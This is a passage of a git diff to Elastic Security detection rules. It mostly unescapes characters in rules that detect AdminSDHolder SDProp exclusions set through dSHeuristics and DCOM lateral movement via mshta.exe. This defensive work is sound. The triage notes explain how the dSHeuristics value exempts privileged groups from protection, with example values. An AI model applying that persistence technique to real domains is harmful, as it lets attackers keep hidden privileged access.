If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
- "query": "any where host.os.type == \"windows\" and event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) \u003e 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n",
+ "query": "any where host.os.type == \"windows\" and event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n",
 "references": [
 "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad",
 "https://petri.com/active-directory-security-understanding-adminsdholder-object"
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_106.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_106.json
index 704ddf40f87..25bfe5bcd1e 100644
--- a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_106.json
@@ -14,7 +14,7 @@
 "license": "Elastic License v2",
 "name": "AdminSDHolder SDProp Exclusion Added",
 "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). 
If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
- "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) \u003e 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n",
+ "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n",
 "references": [
 "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad",
 "https://petri.com/active-directory-security-understanding-adminsdholder-object"
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_107.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_107.json
index 2dce6339d22..852b67fb42a 100644
--- a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_107.json
@@ -14,7 +14,7 @@
 "license": "Elastic License v2",
 "name": "AdminSDHolder SDProp Exclusion Added",
 "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). 
If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
- "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) \u003e 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n",
+ "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n",
 "references": [
 "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad",
 "https://petri.com/active-directory-security-understanding-adminsdholder-object"
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_108.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_108.json
index 061b5bc6285..e5ae52c758a 100644
--- a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_108.json
@@ -14,7 +14,7 @@
 "license": "Elastic License v2",
 "name": "AdminSDHolder SDProp Exclusion Added",
 "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). 
If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
- "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) \u003e 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n",
+ "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n",
 "references": [
 "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad",
 "https://petri.com/active-directory-security-understanding-adminsdholder-object"
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_109.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_109.json
index eb5aa191c48..b7b0ed00e1d 100644
--- a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_109.json
@@ -14,7 +14,7 @@
 "license": "Elastic License v2",
 "name": "AdminSDHolder SDProp Exclusion Added",
 "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). 
If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
- "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) \u003e 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n",
+ "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n",
 "references": [
 "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad",
 "https://petri.com/active-directory-security-understanding-adminsdholder-object"
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7",
- "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/621e92b6-7e54-11ee-bdc0-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/621e92b6-7e54-11ee-bdc0-f661ea17fbcd_1.json
index 3571e81f5be..ef54f9a7dbb 100644
--- a/packages/security_detection_engine/kibana/security_rule/621e92b6-7e54-11ee-bdc0-f661ea17fbcd_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/621e92b6-7e54-11ee-bdc0-f661ea17fbcd_1.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_103.json b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_103.json
index 895387ba984..868c55c6cba 100644
--- a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_103.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement via MSHTA", - "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", "references": [ "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" ], @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_104.json b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_104.json index 71eccea2969..f9ab0169c77 100644 --- a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement via MSHTA", - "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", "references": [ "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" ], @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_105.json b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_105.json index 1149139a72e..773107c0cb8 100644 
--- a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_105.json +++ b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement via MSHTA", - "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", "references": [ "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" ], @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_105.json b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_105.json index 01c5ecd0040..c9a082b0d0f 100644 --- a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_105.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_106.json b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_106.json index 058c410c45f..6c21cd37273 100644 --- a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_106.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_107.json b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_107.json index efb2da7cd11..ae36dffd771 100644 --- a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_107.json +++ 